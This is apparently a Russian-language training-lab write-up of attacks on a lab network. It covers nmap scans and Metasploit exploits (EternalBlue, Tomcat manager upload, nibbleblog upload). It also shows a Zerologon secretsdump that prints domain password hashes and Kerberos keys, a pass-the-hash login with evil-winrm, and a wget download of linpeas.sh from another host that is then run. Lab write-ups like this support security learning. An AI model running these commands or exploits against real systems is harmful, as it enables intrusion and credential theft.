# Final LAB Network infrastructure attack
# NMAP Сканим сеть
Узнаем какие машины есть в сети.
* nmap 192.168.100.0/24 -T4
```
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-12 14:53 MSK
Nmap scan report for 192.168.100.1
Host is up (0.014s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp open domain
Nmap scan report for 192.168.100.7
Host is up (0.016s latency).
Not shown: 991 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5357/tcp open wsdapi
49152/tcp open unknown
49153/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
Nmap scan report for 192.168.100.9
Host is up (0.011s latency).
Not shown: 986 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
3306/tcp open mysql
3389/tcp open ms-wbt-server
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49158/tcp open unknown
49159/tcp open unknown
Nmap scan report for 192.168.100.11
Host is up (0.014s latency).
Not shown: 995 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5357/tcp open wsdapi
Nmap scan report for 192.168.100.12
Host is up (0.0099s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
8080/tcp open http-proxy
Nmap scan report for 192.168.100.16
Host is up (0.011s latency).
Not shown: 988 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
Nmap scan report for 192.168.100.18
Host is up (0.011s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
31337/tcp open Elite
Nmap scan report for 192.168.100.20
Host is up (0.012s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap scan report for 192.168.100.24
Host is up (0.0098s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
```
# HOSTS
## 192.168.100.7 (win7 sp1)- ms17-010
```
Nmap scan report for 192.168.100.7
Host is up (0.015s latency).
Not shown: 989 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ms-wbt-server?
| rdp-vuln-ms12-020:
| VULNERABLE:
| MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability
| State: VULNERABLE
| IDs: CVE:CVE-2012-0152
| Risk factor: Medium CVSSv2: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:N/A:P)
| Remote Desktop Protocol vulnerability that could allow remote attackers to cause a denial of service.
|
| Disclosure date: 2012-03-13
| References:
| http://technet.microsoft.com/en-us/security/bulletin/ms12-020
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0152
|
| MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability
| State: VULNERABLE
| IDs: CVE:CVE-2012-0002
| Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
| Remote Desktop Protocol vulnerability that could allow remote attackers to execute arbitrary code on the targeted system.
|
| Disclosure date: 2012-03-13
| References:
| http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0002
|_ssl-ccs-injection: No reply from server (TIMEOUT)
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: OFFICE-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
```
Use exploit windows/smb/ms17_010_eternalblue
Переходим в юзера - Администратора- Десктоп
И не находим файл с флагом
Далее пытаюсь переподключится к машине раз 10 и поискать файл с флагом, но по итоге по ходу сломал соединение. Так как машина стала неуязвима)
## 192.168.100.9 - ms17_010 (psexec)
Scan vuln
* nmap 192.168.100.9 --script vuln
```
Nmap scan report for 192.168.100.9
Host is up (0.60s latency).
Not shown: 986 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-trace: TRACE is enabled
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /robots.txt: Robots file
|_ /icons/: Potentially interesting folder w/ directory listing
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.100.9
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.100.9:80/
| Form id: username
| Form action: index.php
|
| Path: http://192.168.100.9:80/index.php
| Form id: username
| Form action: index.php
|
| Path: http://192.168.100.9:80/register.php
| Form id: username
| Form action: register.php
|
| Path: http://192.168.100.9:80/forgot.php
| Form id:
|_ Form action:
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
|_http-trace: TRACE is enabled
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
| Modulus Type: Safe prime
| Modulus Source: RFC2409/Oakley Group 2
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
|_ https://weakdh.org
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.100.9
| Found the following possible CSRF vulnerabilities:
|
| Path: https://192.168.100.9:443/
| Form id: username
| Form action: index.php
|
| Path: https://192.168.100.9:443/forgot.php
| Form id:
| Form action:
|
| Path: https://192.168.100.9:443/index.php
| Form id: username
| Form action: index.php
|
| Path: https://192.168.100.9:443/register.php
| Form id: username
|_ Form action: register.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
445/tcp open microsoft-ds
3306/tcp open mysql
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
3389/tcp open ms-wbt-server
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
| Modulus Type: Safe prime
| Modulus Source: RFC2409/Oakley Group 2
| Modulus Length: 1024
| Generator Length: 1024
| Public Key Length: 1024
| References:
|_ https://weakdh.org
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
Nmap done: 1 IP address (1 host up) scanned in 366.53 seconds
```
Nmap нам подсветил уязвимость **smb-vuln-ms17-010**
Go to Metasploit & Attack host
* msfconsole -q
* search ms17_010
* use exploit(windows/smb/ms17_010_psexec)
Перейдем в папку Administrator/Desktop
**Нашли флаг**
## 192.168.100.16 - DC tech.local
С помощью **linWinPWN** сканируем ДК
! Authentications method: null session
This is zerologon!
### ZEROLOGON
**Secretsdump** - дампим доменные креды из NTDS.DIT
```
python3 /usr/share/doc/python3-impacket/examples/secretsdump.py DC01\$@192.168.100.16 -just-dc -no-pass
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a73a2b453dd867f6a95dc81a6a907033:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:48e0bad80cafc6fd7bd74d30689eb496:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
tech.local\engineer:1104:aad3b435b51404eeaad3b435b51404ee:f67e6562390dea47df701c6ee299ca6f:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ENGINEER$:1105:aad3b435b51404eeaad3b435b51404ee:728e84d1372639f874df339765d5d66d:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:8e199819a4223a913fcbfdf8eba62cb516d279453bbc5ab563d1beb90fa6b940
krbtgt:aes128-cts-hmac-sha1-96:98b58976dffca6b3d4f61d475ef0f07a
krbtgt:des-cbc-md5:64755b86aec7ece9
tech.local\engineer:aes256-cts-hmac-sha1-96:36253ff90c65b10a33603710d55786d5ce5f6fd742779a2a099315b7babcf888
tech.local\engineer:aes128-cts-hmac-sha1-96:26eed2110ec5d3b04764bd3a548d047c
tech.local\engineer:des-cbc-md5:765b0494574567b3
DC01$:aes256-cts-hmac-sha1-96:364a3e7060014999643ef3ea105a6c50ca48849951d7840e2846dff3bdce7f98
DC01$:aes128-cts-hmac-sha1-96:b29233c7d3deaef093bb33dd64729d51
DC01$:des-cbc-md5:daea2907abfd3d3d
ENGINEER$:aes256-cts-hmac-sha1-96:b6efcef02ca7a74fa379bc78e1bc593f305f30d60fe6fa2bd0ad23dded68af98
ENGINEER$:aes128-cts-hmac-sha1-96:ea2ed64ccadd0dd6f7b5d59160a9f7f9
ENGINEER$:des-cbc-md5:0ed61cdf680d2975
[*] Cleaning up...
```
Так же можем использовать для дампа кредов **metasploit**
Подключаемся к машине через **Evil-Winrm** с логином и хэшом администратора
* evil-winrm -i 192.168.100.16 -u Administrator -H a73a2b453dd867f6a95dc81a6a907033
### Получаем флаг админа домена
* Evil-WinRM* PS C:\> whoami /groups
```
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ========================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
TECH\Group Policy Creator Owners Group S-1-5-21-2863272-3253994480-1350133221-520 Mandatory group, Enabled by default, Enabled group
TECH\Domain Admins Group S-1-5-21-2863272-3253994480-1350133221-512 Mandatory group, Enabled by default, Enabled group
TECH\Enterprise Admins Group S-1-5-21-2863272-3253994480-1350133221-519 Mandatory group, Enabled by default, Enabled group
TECH\Schema Admins Group S-1-5-21-2863272-3253994480-1350133221-518 Mandatory group, Enabled by default, Enabled group
TECH\Denied RODC Password Replication Group Alias S-1-5-21-2863272-3253994480-1350133221-572 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
```
## 192.168.100.12 tomcat
Computer name : portal
Перешли в браузер на порт 8080
ввели несуществующие логин и пароль и он выдал дефолтные логин и пароль, с помощью которых войдем
Используем exploit tomcat_mgr_upload
Перейдем в /home/user
Нашли флаг юзера
Post module tomcat выдал нам еще польз и пароли
* Повышаем привилегии
```
Файл /etc/passwd содержит информацию об учетных записях пользователей. Он доступен для чтения по всему миру, но обычно доступен только для записи пользователем root. Исторически сложилось так, что файл /etc/passwd содержал хэши паролей пользователя, а некоторые версии Linux по-прежнему позволяют хранить там хэши паролей. Если у нас есть доступ на запись к этому файлу в качестве пользователя низкого уровня, мы можем злоупотреблять этой привилегией, чтобы фактически перезаписать хэш пароля пользователя root.
```
К сожалению в моем случае разрешения на запись файла /etc/passwd - исчезло.
Далее попробовал загрузить линпис на машину:
python -c ‘import pty; pty.spawn(“/bin/bash”)’
wget 10.8.0.2:80/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
Изучил отчет. Попробовал разные СVE, но безуспешно.
У некоторых выдал ошибки при компиляции. Некоторые не отработали. Потратил 2 суток на решение этой тачки. Предполагаю что решение с повышением привилегии - использовать suid. Но без помощи коллег с этим я пока не справлюсь.
## 192.168.100.24 - nibbleblog
Переберем директории
* gobuster dir -u 192.168.100.24 -k -t 50 -b 404,403 -x txt,html,bak,old -o gb_hr.txt -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
```
─# cat gb_hr.txt 127 ⨯
/content (Status: 301) [Size: 318] [--> http://192.168.100.24/content/]
/themes (Status: 301) [Size: 317] [--> http://192.168.100.24/themes/]
/admin (Status: 301) [Size: 316] [--> http://192.168.100.24/admin/]
/plugins (Status: 301) [Size: 318] [--> http://192.168.100.24/plugins/]
/README (Status: 200) [Size: 4628]
/languages (Status: 301) [Size: 320] [--> http://192.168.100.24/languages/]
/javascript (Status: 301) [Size: 321] [--> http://192.168.100.24/javascript/]
/LICENSE (Status: 200) [Size: 35148]
/LICENSE.txt (Status: 200) [Size: 35148]
/COPYRIGHT.txt (Status: 200) [Size: 1272]
/COPYRIGHT (Status: 200) [Size: 1272]
```
При переходе по ссылкам выдает - Доступ запрещен
Scan nmap vuln
* nmap 192.168.100.24 --script vuln -Pn -sS
```
└─# nmap 192.168.100.24 --script vuln -Pn -sS 2 ⚙
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-13 17:56 MSK
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.100.24
Host is up (0.15s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-cookie-flags:
| /:
| PHPSESSID:
| httponly flag not set
| /admin.php:
| PHPSESSID:
|_ httponly flag not set
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-enum:
| /admin.php: Possible admin folder
|_ /README: Interesting, a readme.
| http-fileupload-exploiter:
|
|_ Couldn't find a file-type field.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
```
НМАП подсветил по адресу 192.168.100.24/admin.php есть что то интересное.
Пробуем логинится под дефолтными кредами:
admin:admin
Вошли в админку
Следующий шаг -получить реверс шелл
Находим эксплойт в метасплойте
* exploit(multi/http/nibbleblog_file_upload)
Получаем сессию
Получили флаг юзера
Повышаем привилегии
* sudo su
Получили флаг root
# Итог - Мое мнение
Чувствую себя немного скрипт-кидди.
Но с учетом моего "бэкграунда", даже то что я смог войти в системы используя скрипты и в основном метасплойт - считаю что это прогресс для меня))
Лаба очень понравилась, я понял что мне еще очень много необходимо освоить и понять.
Sign in with Wallet
Connect another wallet